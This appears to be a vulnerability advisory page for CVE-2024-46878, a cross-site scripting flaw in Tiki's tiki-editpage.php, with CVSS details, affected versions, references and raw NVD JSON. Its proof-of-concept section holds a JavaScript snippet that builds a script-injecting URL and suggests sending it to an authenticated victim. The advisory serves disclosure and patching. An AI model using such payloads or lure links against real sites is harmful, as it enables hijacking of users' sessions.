Security Vulnerability Report

CVE-2024-46878

Published: 2026-03-23 20:16:22
Last Modified: 2026-04-02 20:11:23

Description

A Cross-Site Scripting (XSS) vulnerability exists in the page parameter of tiki-editpage.php in Tiki version 26.3 and earlier. This vulnerability allows attackers to execute arbitrary JavaScript code via a crafted payload, leading to potential access to sensitive information or unauthorized actions.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:* - VULNERABLE
Tiki Wiki CMS Groupware, all versions before 27.1 (NVD configuration: versionEndExcluding 27.1). The description names 26.3 and earlier; the vendor release notes listed under References cover security updates for the 27.x LTS, 26.x and 24.x LTS branches, so check the fixed release for the branch you run rather than relying on the 26.3 cutoff alone.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2024-46878
// The vulnerability is located in the 'page' parameter of tiki-editpage.php

// Payload to demonstrate XSS execution
var payload = '<script>alert(\'CVE-2024-46878-XSS\');</script>';

// Construct the malicious URL (URL-encoding keeps the payload intact in the query string)
var targetUrl = 'http://target-domain/tiki-editpage.php?page=' + encodeURIComponent(payload);

// Simulate sending the link to a victim (social engineering)
console.log('Send this URL to an authenticated user: ' + targetUrl);
// When the user clicks, the script executes in the context of the victim's browser session.

References

https://github.com/ColdFusionX/CVE-2024-46878-TikiCMS-XSS (Exploit, Third Party Advisory)
https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended (Release Notes)
https://tiki.org/tiki-newsletters.php?nlId=8&info=1 (Product)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2024-46878",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T20:16:22.383",
    "lastModified": "2026-04-02T20:11:23.367",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in the page parameter of tiki-editpage.php in Tiki version 26.3 and earlier. This vulnerability allows attackers to execute arbitrary JavaScript code via a crafted payload, leading to potential access to sensitive information or unauthorized actions."},
      {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) existe en el parámetro 'page' de tiki-editpage.PHP en Tiki versión 26.3 y anteriores. Esta vulnerabilidad permite a los atacantes ejecutar código JavaScript arbitrario mediante una carga útil manipulada, lo que puede llevar a un acceso potencial a información sensible o acciones no autorizadas."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*", "versionEndExcluding": "27.1", "matchCriteriaId": "827E97B6-4AE3-4807-8A3D-DDB9039B0ECE"}]}]}
    ],
    "references": [
      {"url": "https://github.com/ColdFusionX/CVE-2024-46878-TikiCMS-XSS", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]},
      {"url": "https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://tiki.org/tiki-newsletters.php?nlId=8&info=1", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/ColdFusionX/CVE-2024-46878-TikiCMS-XSS", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}
    ]
  }
}